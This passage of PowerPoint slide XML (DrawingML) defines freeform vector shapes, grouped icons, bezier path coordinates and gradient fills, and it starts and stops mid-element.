                <a:gd name="T4" fmla="*/ 5150 w 5150"/>
                <a:gd name="T5" fmla="*/ 1380 h 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50" h="1380">
                  <a:moveTo>
                    <a:pt x="5150" y="1380"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5150" y="138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062" name="Freeform 825">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2896AE69-1E0A-49B8-AA6F-D6B3BC511574}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="7076305" y="2244725"/>
              <a:ext cx="576262" cy="153988"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 5148 w 5148"/>
                <a:gd name="T1" fmla="*/ 1379 h 1379"/>
                <a:gd name="T2" fmla="*/ 0 w 5148"/>
                <a:gd name="T3" fmla="*/ 0 h 1379"/>
                <a:gd name="T4" fmla="*/ 5148 w 5148"/>
                <a:gd name="T5" fmla="*/ 1379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48" h="1379">
                  <a:moveTo>
                    <a:pt x="5148" y="1379"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5148" y="137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063" name="Freeform 826">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C64734A-B067-4AF5-8045-114AB1FF7405}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="7898630" y="2022475"/>
              <a:ext cx="577850" cy="155575"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 5150 w 5150"/>
                <a:gd name="T1" fmla="*/ 1380 h 1380"/>
                <a:gd name="T2" fmla="*/ 0 w 5150"/>
                <a:gd name="T3" fmla="*/ 0 h 1380"/>
                <a:gd name="T4" fmla="*/ 5150 w 5150"/>
                <a:gd name="T5" fmla="*/ 1380 h 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50" h="1380">
                  <a:moveTo>
                    <a:pt x="5150" y="1380"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5150" y="138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064" name="Freeform 827">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CE6D96D-4109-4F6B-8154-2A22FB07D0F8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="7350942" y="2170113"/>
              <a:ext cx="576263" cy="155575"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 5147 w 5147"/>
                <a:gd name="T1" fmla="*/ 1380 h 1380"/>
                <a:gd name="T2" fmla="*/ 0 w 5147"/>
                <a:gd name="T3" fmla="*/ 0 h 1380"/>
                <a:gd name="T4" fmla="*/ 5147 w 5147"/>
                <a:gd name="T5" fmla="*/ 1380 h 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47" h="1380">
                  <a:moveTo>
                    <a:pt x="5147" y="1380"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5147" y="138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065" name="Freeform 828">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3ED2CD1-C481-42E6-8BF9-DD3192B46908}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="6801667" y="2317750"/>
              <a:ext cx="576263" cy="155575"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 5147 w 5147"/>
                <a:gd name="T1" fmla="*/ 1382 h 1382"/>
                <a:gd name="T2" fmla="*/ 0 w 5147"/>
                <a:gd name="T3" fmla="*/ 0 h 1382"/>
                <a:gd name="T4" fmla="*/ 5147 w 5147"/>
                <a:gd name="T5" fmla="*/ 1382 h 1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47" h="1382">
                  <a:moveTo>
                    <a:pt x="5147" y="1382"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5147" y="13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066" name="Group 2298">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E89C892B-C2A3-47F1-9B77-1407E0D470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3517" y="1354138"/>
              <a:ext cx="2044700" cy="684213"/>
              <a:chOff x="2248" y="1979"/>
              <a:chExt cx="1288" cy="431"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2682" name="Freeform 1721">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58D5CFE5-6C61-4ADD-970E-4BE7FA2683D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248" y="2064"/>
                <a:ext cx="1288" cy="346"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 161"/>
                  <a:gd name="T1" fmla="*/ 22 h 44"/>
                  <a:gd name="T2" fmla="*/ 81 w 161"/>
                  <a:gd name="T3" fmla="*/ 0 h 44"/>
                  <a:gd name="T4" fmla="*/ 161 w 161"/>
                  <a:gd name="T5" fmla="*/ 22 h 44"/>
                  <a:gd name="T6" fmla="*/ 81 w 161"/>
                  <a:gd name="T7" fmla="*/ 44 h 44"/>
                  <a:gd name="T8" fmla="*/ 0 w 161"/>
                  <a:gd name="T9" fmla="*/ 2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44">
                    <a:moveTo>
                      <a:pt x="0" y="22"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="81" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="44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2B2B2">
                      <a:gamma/>
                      <a:tint val="68627"/>
                      <a:invGamma/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="B2B2B2"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gradFill>
              <a:ln w="190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683" name="Group 1722">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E9D97BF-376A-4C38-ABA8-40A1A895B7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70" y="1979"/>
                <a:ext cx="536" cy="344"/>
                <a:chOff x="1288" y="2730"/>
                <a:chExt cx="1084" cy="694"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="2684" name="Group 1723">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E30B87D-325A-4A93-A88F-78161F8322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72" y="2730"/>
                  <a:ext cx="312" cy="532"/>
                  <a:chOff x="1924" y="1129"/>
                  <a:chExt cx="312" cy="532"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="2718" name="Freeform 1724">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00D389AC-2734-44E6-945F-C0015629DB59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gray">
                  <a:xfrm>
                    <a:off x="1924" y="1216"/>
                    <a:ext cx="312" cy="245"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 235 w 237"/>
                      <a:gd name="T1" fmla="*/ 113 h 186"/>
                      <a:gd name="T2" fmla="*/ 235 w 237"/>
                      <a:gd name="T3" fmla="*/ 113 h 186"/>
                      <a:gd name="T4" fmla="*/ 225 w 237"/>
                      <a:gd name="T5" fmla="*/ 49 h 186"/>
                      <a:gd name="T6" fmla="*/ 199 w 237"/>
                      <a:gd name="T7" fmla="*/ 24 h 186"/>
                      <a:gd name="T8" fmla="*/ 156 w 237"/>
                      <a:gd name="T9" fmla="*/ 12 h 186"/>
                      <a:gd name="T10" fmla="*/ 116 w 237"/>
                      <a:gd name="T11" fmla="*/ 2 h 186"/>
                      <a:gd name="T12" fmla="*/ 87 w 237"/>
                      <a:gd name="T13" fmla="*/ 12 h 186"/>
                      <a:gd name="T14" fmla="*/ 73 w 237"/>
                      <a:gd name="T15" fmla="*/ 85 h 186"/>
                      <a:gd name="T16" fmla="*/ 73 w 237"/>
                      <a:gd name="T17" fmla="*/ 85 h 186"/>
                      <a:gd name="T18" fmla="*/ 72 w 237"/>
                      <a:gd name="T19" fmla="*/ 90 h 186"/>
                      <a:gd name="T20" fmla="*/ 21 w 237"/>
                      <a:gd name="T21" fmla="*/ 104 h 186"/>
                      <a:gd name="T22" fmla="*/ 26 w 237"/>
                      <a:gd name="T23" fmla="*/ 135 h 186"/>
                      <a:gd name="T24" fmla="*/ 80 w 237"/>
                      <a:gd name="T25" fmla="*/ 122 h 186"/>
                      <a:gd name="T26" fmla="*/ 80 w 237"/>
                      <a:gd name="T27" fmla="*/ 122 h 186"/>
                      <a:gd name="T28" fmla="*/ 86 w 237"/>
                      <a:gd name="T29" fmla="*/ 120 h 186"/>
                      <a:gd name="T30" fmla="*/ 99 w 237"/>
                      <a:gd name="T31" fmla="*/ 112 h 186"/>
                      <a:gd name="T32" fmla="*/ 104 w 237"/>
                      <a:gd name="T33" fmla="*/ 92 h 186"/>
                      <a:gd name="T34" fmla="*/ 104 w 237"/>
                      <a:gd name="T35" fmla="*/ 92 h 186"/>
                      <a:gd name="T36" fmla="*/ 110 w 237"/>
                      <a:gd name="T37" fmla="*/ 47 h 186"/>
                      <a:gd name="T38" fmla="*/ 109 w 237"/>
                      <a:gd name="T39" fmla="*/ 160 h 186"/>
                      <a:gd name="T40" fmla="*/ 119 w 237"/>
                      <a:gd name="T41" fmla="*/ 170 h 186"/>
                      <a:gd name="T42" fmla="*/ 169 w 237"/>
                      <a:gd name="T43" fmla="*/ 184 h 186"/>
                      <a:gd name="T44" fmla="*/ 196 w 237"/>
                      <a:gd name="T45" fmla="*/ 165 h 186"/>
                      <a:gd name="T46" fmla="*/ 196 w 237"/>
                      <a:gd name="T47" fmla="*/ 160 h 186"/>
                      <a:gd name="T48" fmla="*/ 216 w 237"/>
                      <a:gd name="T49" fmla="*/ 155 h 186"/>
                      <a:gd name="T50" fmla="*/ 219 w 237"/>
                      <a:gd name="T51" fmla="*/ 154 h 186"/>
                      <a:gd name="T52" fmla="*/ 232 w 237"/>
                      <a:gd name="T53" fmla="*/ 146 h 186"/>
                      <a:gd name="T54" fmla="*/ 237 w 237"/>
                      <a:gd name="T55" fmla="*/ 124 h 186"/>
                      <a:gd name="T56" fmla="*/ 235 w 237"/>
                      <a:gd name="T57" fmla="*/ 113 h 186"/>
                      <a:gd name="T58" fmla="*/ 193 w 237"/>
                      <a:gd name="T59" fmla="*/ 75 h 186"/>
                      <a:gd name="T60" fmla="*/ 194 w 237"/>
                      <a:gd name="T61" fmla="*/ 87 h 186"/>
                      <a:gd name="T62" fmla="*/ 200 w 237"/>
                      <a:gd name="T63" fmla="*/ 123 h 186"/>
                      <a:gd name="T64" fmla="*/ 196 w 237"/>
                      <a:gd name="T65" fmla="*/ 124 h 186"/>
                      <a:gd name="T66" fmla="*/ 194 w 237"/>
                      <a:gd name="T67" fmla="*/ 87 h 186"/>
                      <a:gd name="T68" fmla="*/ 193 w 237"/>
                      <a:gd name="T69" fmla="*/ 75 h 186"/>
                      <a:gd name="T70" fmla="*/ 192 w 237"/>
                      <a:gd name="T71" fmla="*/ 70 h 186"/>
                      <a:gd name="T72" fmla="*/ 193 w 237"/>
                      <a:gd name="T73" fmla="*/ 75 h 1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37" h="186">
                        <a:moveTo>
                          <a:pt x="235" y="113"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="235" y="113"/>
                          <a:pt x="235" y="113"/>
                          <a:pt x="235" y="113"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="230" y="84"/>
                          <a:pt x="226" y="57"/>
                          <a:pt x="225" y="49"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="223" y="32"/>
                          <a:pt x="207" y="26"/>
                          <a:pt x="199" y="24"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="192" y="21"/>
                          <a:pt x="169" y="16"/>
                          <a:pt x="156" y="12"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="145" y="9"/>
                          <a:pt x="125" y="3"/>
                          <a:pt x="116" y="2"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="107" y="0"/>
                          <a:pt x="90" y="4"/>
                          <a:pt x="87" y="12"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="86" y="14"/>
                          <a:pt x="79" y="50"/>
                          <a:pt x="73" y="85"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="73" y="85"/>
                          <a:pt x="73" y="85"/>
                          <a:pt x="73" y="85"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="72" y="90"/>
                          <a:pt x="72" y="90"/>
                          <a:pt x="72" y="90"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="49" y="96"/>
                          <a:pt x="29" y="102"/>
                          <a:pt x="21" y="104"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="108"/>
                          <a:pt x="9" y="137"/>
                          <a:pt x="26" y="135"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="31" y="135"/>
                          <a:pt x="55" y="129"/>
                          <a:pt x="80" y="122"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="80" y="122"/>
                          <a:pt x="80" y="122"/>
                          <a:pt x="80" y="122"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="86" y="120"/>
                          <a:pt x="86" y="120"/>
                          <a:pt x="86" y="120"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="92" y="118"/>
                          <a:pt x="96" y="116"/>
                          <a:pt x="99" y="112"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="102" y="108"/>
                          <a:pt x="104" y="102"/>
                          <a:pt x="104" y="92"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="104" y="92"/>
                          <a:pt x="104" y="92"/>
                          <a:pt x="104" y="92"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="65"/>
                          <a:pt x="111" y="43"/>
                          <a:pt x="110" y="47"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="110" y="53"/>
                          <a:pt x="109" y="117"/>
                          <a:pt x="109" y="160"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="110" y="165"/>
                          <a:pt x="112" y="170"/>
                          <a:pt x="119" y="170"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="131" y="173"/>
                          <a:pt x="162" y="183"/>
                          <a:pt x="169" y="184"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="178" y="186"/>
                          <a:pt x="193" y="176"/>
                          <a:pt x="196" y="165"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="196" y="163"/>
                          <a:pt x="196" y="162"/>
                          <a:pt x="196" y="160"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="202" y="158"/>
                          <a:pt x="209" y="157"/>
                          <a:pt x="216" y="155"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="217" y="154"/>
                          <a:pt x="218" y="154"/>
                          <a:pt x="219" y="154"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="225" y="152"/>
                          <a:pt x="229" y="150"/>
                          <a:pt x="232" y="146"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="235" y="141"/>
                          <a:pt x="237" y="135"/>
                          <a:pt x="237" y="124"/>
                        </a:cubicBezTo>
                        <a:lnTo>
                          <a:pt x="235" y="113"/>
                        </a:lnTo>
                        <a:close/>
                        <a:moveTo>
                          <a:pt x="193" y="75"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="194" y="79"/>
                          <a:pt x="194" y="83"/>
                          <a:pt x="194" y="87"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="196" y="96"/>
                          <a:pt x="198" y="108"/>
                          <a:pt x="200" y="123"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="199" y="123"/>
                          <a:pt x="197" y="123"/>
                          <a:pt x="196" y="124"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="196" y="111"/>
                          <a:pt x="195" y="99"/>
                          <a:pt x="194" y="87"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="194" y="82"/>
                          <a:pt x="193" y="78"/>
                          <a:pt x="193" y="75"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="192" y="73"/>
                          <a:pt x="192" y="72"/>
                          <a:pt x="192" y="70"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="192" y="72"/>
                          <a:pt x="193" y="73"/>
                          <a:pt x="193" y="75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accent1"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:schemeClr val="accent1">
                          <a:gamma/>
                          <a:tint val="62745"/>
                          <a:invGamma/>
                        </a:scheme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19" name="Freeform 1725">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63171D1C-1117-444F-BFD9-4E65374626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079" y="1200"/>
                    <a:ext cx="87" cy="54"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 30 w 66"/>
                      <a:gd name="T1" fmla="*/ 39 h 41"/>
                      <a:gd name="T2" fmla="*/ 10 w 66"/>
                      <a:gd name="T3" fmla="*/ 23 h 41"/>
                      <a:gd name="T4" fmla="*/ 16 w 66"/>
                      <a:gd name="T5" fmla="*/ 13 h 41"/>
                      <a:gd name="T6" fmla="*/ 54 w 66"/>
                      <a:gd name="T7" fmla="*/ 16 h 41"/>
                      <a:gd name="T8" fmla="*/ 57 w 66"/>
                      <a:gd name="T9" fmla="*/ 29 h 41"/>
                      <a:gd name="T10" fmla="*/ 30 w 66"/>
                      <a:gd name="T11" fmla="*/ 39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6" h="41">
                        <a:moveTo>
                          <a:pt x="30" y="39"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="14" y="37"/>
                          <a:pt x="0" y="25"/>
                          <a:pt x="10" y="23"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="17" y="21"/>
                          <a:pt x="13" y="15"/>
                          <a:pt x="16" y="13"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="19" y="10"/>
                          <a:pt x="54" y="0"/>
                          <a:pt x="54" y="16"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="54" y="21"/>
                          <a:pt x="48" y="25"/>
                          <a:pt x="57" y="29"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="66" y="33"/>
                          <a:pt x="46" y="41"/>
                          <a:pt x="30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20" name="Freeform 1726">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CF4B051-7FF9-44FC-BBA5-C7518B0C6E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973" y="1424"/>
                    <a:ext cx="209" cy="237"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 159 w 159"/>
                      <a:gd name="T1" fmla="*/ 6 h 180"/>
                      <a:gd name="T2" fmla="*/ 132 w 159"/>
                      <a:gd name="T3" fmla="*/ 21 h 180"/>
                      <a:gd name="T4" fmla="*/ 81 w 159"/>
                      <a:gd name="T5" fmla="*/ 11 h 180"/>
                      <a:gd name="T6" fmla="*/ 72 w 159"/>
                      <a:gd name="T7" fmla="*/ 0 h 180"/>
                      <a:gd name="T8" fmla="*/ 68 w 159"/>
                      <a:gd name="T9" fmla="*/ 19 h 180"/>
                      <a:gd name="T10" fmla="*/ 17 w 159"/>
                      <a:gd name="T11" fmla="*/ 32 h 180"/>
                      <a:gd name="T12" fmla="*/ 1 w 159"/>
                      <a:gd name="T13" fmla="*/ 55 h 180"/>
                      <a:gd name="T14" fmla="*/ 1 w 159"/>
                      <a:gd name="T15" fmla="*/ 145 h 180"/>
                      <a:gd name="T16" fmla="*/ 36 w 159"/>
                      <a:gd name="T17" fmla="*/ 156 h 180"/>
                      <a:gd name="T18" fmla="*/ 43 w 159"/>
                      <a:gd name="T19" fmla="*/ 145 h 180"/>
                      <a:gd name="T20" fmla="*/ 42 w 159"/>
                      <a:gd name="T21" fmla="*/ 73 h 180"/>
                      <a:gd name="T22" fmla="*/ 42 w 159"/>
                      <a:gd name="T23" fmla="*/ 73 h 180"/>
                      <a:gd name="T24" fmla="*/ 42 w 159"/>
                      <a:gd name="T25" fmla="*/ 72 h 180"/>
                      <a:gd name="T26" fmla="*/ 42 w 159"/>
                      <a:gd name="T27" fmla="*/ 66 h 180"/>
                      <a:gd name="T28" fmla="*/ 42 w 159"/>
                      <a:gd name="T29" fmla="*/ 64 h 180"/>
                      <a:gd name="T30" fmla="*/ 42 w 159"/>
                      <a:gd name="T31" fmla="*/ 63 h 180"/>
                      <a:gd name="T32" fmla="*/ 59 w 159"/>
                      <a:gd name="T33" fmla="*/ 41 h 180"/>
                      <a:gd name="T34" fmla="*/ 103 w 159"/>
                      <a:gd name="T35" fmla="*/ 30 h 180"/>
                      <a:gd name="T36" fmla="*/ 103 w 159"/>
                      <a:gd name="T37" fmla="*/ 30 h 180"/>
                      <a:gd name="T38" fmla="*/ 59 w 159"/>
                      <a:gd name="T39" fmla="*/ 41 h 180"/>
                      <a:gd name="T40" fmla="*/ 42 w 159"/>
                      <a:gd name="T41" fmla="*/ 63 h 180"/>
                      <a:gd name="T42" fmla="*/ 42 w 159"/>
                      <a:gd name="T43" fmla="*/ 71 h 180"/>
                      <a:gd name="T44" fmla="*/ 42 w 159"/>
                      <a:gd name="T45" fmla="*/ 72 h 180"/>
                      <a:gd name="T46" fmla="*/ 42 w 159"/>
                      <a:gd name="T47" fmla="*/ 77 h 180"/>
                      <a:gd name="T48" fmla="*/ 42 w 159"/>
                      <a:gd name="T49" fmla="*/ 77 h 180"/>
                      <a:gd name="T50" fmla="*/ 43 w 159"/>
                      <a:gd name="T51" fmla="*/ 154 h 180"/>
                      <a:gd name="T52" fmla="*/ 43 w 159"/>
                      <a:gd name="T53" fmla="*/ 154 h 180"/>
                      <a:gd name="T54" fmla="*/ 43 w 159"/>
                      <a:gd name="T55" fmla="*/ 157 h 180"/>
                      <a:gd name="T56" fmla="*/ 84 w 159"/>
                      <a:gd name="T57" fmla="*/ 157 h 180"/>
                      <a:gd name="T58" fmla="*/ 85 w 159"/>
                      <a:gd name="T59" fmla="*/ 77 h 180"/>
                      <a:gd name="T60" fmla="*/ 89 w 159"/>
                      <a:gd name="T61" fmla="*/ 69 h 180"/>
                      <a:gd name="T62" fmla="*/ 141 w 159"/>
                      <a:gd name="T63" fmla="*/ 55 h 180"/>
                      <a:gd name="T64" fmla="*/ 159 w 159"/>
                      <a:gd name="T65" fmla="*/ 25 h 180"/>
                      <a:gd name="T66" fmla="*/ 159 w 159"/>
                      <a:gd name="T67" fmla="*/ 8 h 180"/>
                      <a:gd name="T68" fmla="*/ 159 w 159"/>
                      <a:gd name="T69" fmla="*/ 6 h 1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9" h="180">
                        <a:moveTo>
                          <a:pt x="159" y="6"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="156" y="17"/>
                          <a:pt x="140" y="23"/>
                          <a:pt x="132" y="21"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="124" y="20"/>
                          <a:pt x="94" y="14"/>
                          <a:pt x="81" y="11"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="75" y="10"/>
                          <a:pt x="73" y="5"/>
                          <a:pt x="72" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="72" y="19"/>
                          <a:pt x="72" y="18"/>
                          <a:pt x="68" y="19"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="68" y="19"/>
                          <a:pt x="28" y="28"/>
                          <a:pt x="17" y="32"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="7" y="36"/>
                          <a:pt x="2" y="42"/>
                          <a:pt x="1" y="55"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1" y="55"/>
                          <a:pt x="0" y="135"/>
                          <a:pt x="1" y="145"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="163"/>
                          <a:pt x="25" y="165"/>
                          <a:pt x="36" y="156"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="39" y="153"/>
                          <a:pt x="43" y="149"/>
                          <a:pt x="43" y="145"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="130"/>
                          <a:pt x="42" y="102"/>
                          <a:pt x="42" y="73"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="73"/>
                          <a:pt x="42" y="73"/>
                          <a:pt x="42" y="73"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="73"/>
                          <a:pt x="42" y="72"/>
                          <a:pt x="42" y="72"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="70"/>
                          <a:pt x="42" y="68"/>
                          <a:pt x="42" y="66"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="65"/>
                          <a:pt x="42" y="65"/>
                          <a:pt x="42" y="64"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="64"/>
                          <a:pt x="42" y="63"/>
                          <a:pt x="42" y="63"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="50"/>
                          <a:pt x="48" y="44"/>
                          <a:pt x="59" y="41"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="68" y="37"/>
                          <a:pt x="101" y="30"/>
                          <a:pt x="103" y="30"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="107" y="28"/>
                          <a:pt x="107" y="28"/>
                          <a:pt x="103" y="30"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="101" y="30"/>
                          <a:pt x="68" y="37"/>
                          <a:pt x="59" y="41"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="48" y="44"/>
                          <a:pt x="43" y="50"/>
                          <a:pt x="42" y="63"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="64"/>
                          <a:pt x="42" y="70"/>
                          <a:pt x="42" y="71"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="71"/>
                          <a:pt x="42" y="71"/>
                          <a:pt x="42" y="72"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="72"/>
                          <a:pt x="42" y="74"/>
                          <a:pt x="42" y="77"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="77"/>
                          <a:pt x="42" y="77"/>
                          <a:pt x="42" y="77"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="154"/>
                          <a:pt x="43" y="154"/>
                          <a:pt x="43" y="154"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="154"/>
